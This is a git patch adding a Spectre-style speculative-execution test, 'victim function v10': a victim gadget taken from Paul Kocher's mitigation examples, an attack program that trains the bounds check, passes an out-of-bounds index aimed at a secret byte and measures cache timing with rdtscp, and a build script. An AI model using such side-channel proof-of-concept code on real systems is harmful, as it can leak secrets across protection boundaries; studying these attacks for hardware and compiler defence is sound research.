From 5c5b6f718e0662e9226bcc55b96270082dffe91b Mon Sep 17 00:00:00 2001 From: Iru Cai Date: Tue, 16 Apr 2019 22:31:31 +0800 Subject: victim function v10 --- attack_code/victim_v10/attack_v10.c | 41 +++++++++++++++++++++++++++++++++++++ attack_code/victim_v10/build.sh | 1 + attack_code/victim_v10/victim_v10.c | 17 +++++++++++++++ 3 files changed, 59 insertions(+) create mode 100644 attack_code/victim_v10/attack_v10.c create mode 100755 attack_code/victim_v10/build.sh create mode 100644 attack_code/victim_v10/victim_v10.c diff --git a/attack_code/victim_v10/attack_v10.c b/attack_code/victim_v10/attack_v10.c new file mode 100644 index 000000000..1c1eecd45 --- /dev/null +++ b/attack_code/victim_v10/attack_v10.c @@ -0,0 +1,41 @@ +#include +#include +#include +#include + +/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */ +#define LLC_SIZE (2 << 20) + +uint8_t dummy[LLC_SIZE]; +size_t array_size = 4; +uint8_t array1[200] = {1, 2, 3, 4}; +uint8_t array2[256 * 64 * 2]; +uint8_t X; +uint8_t temp = 1; + +void victim_function_v10(size_t x, uint8_t k); + +int main() +{ + victim_function_v10(0, 0); + victim_function_v10(0, 0); + victim_function_v10(0, 0); + victim_function_v10(0, 0); + victim_function_v10(0, 0); + + memset(dummy, 1, sizeof(dummy)); // flush L2 + X = 123; // set the secret value, and also bring it to cache + + _mm_mfence(); + + size_t attack_idx = &X - array1; + victim_function_v10(attack_idx, 123); + + unsigned int junk; + volatile uint8_t x; + unsigned long time1 = __rdtscp(&junk); + x ^= array2[0]; + unsigned long time2 = __rdtscp(&junk); + + printf("%d\n", time2 - time1); +} diff --git a/attack_code/victim_v10/build.sh b/attack_code/victim_v10/build.sh new file mode 100755 index 000000000..07897b62d --- /dev/null +++ b/attack_code/victim_v10/build.sh @@ -0,0 +1 @@ +gcc -O2 -o ../../attack_v10 attack_v10.c victim_v10.c -static diff --git a/attack_code/victim_v10/victim_v10.c b/attack_code/victim_v10/victim_v10.c new file mode 100644 index 000000000..193ac750d --- /dev/null +++ b/attack_code/victim_v10/victim_v10.c @@ -0,0 +1,17 @@ +/* code from https://www.paulkocher.com/doc/MicrosoftCompilerSpectreMitigation.html */ + +#include +#include + +extern size_t array_size; +extern uint8_t array1[]; +extern uint8_t array2[]; +extern uint8_t temp; + +void victim_function_v10(size_t x, uint8_t k) +{ + if (x < array_size) { + if (array1[x] == k) + temp &= array2[0]; + } +} -- cgit v1.2.3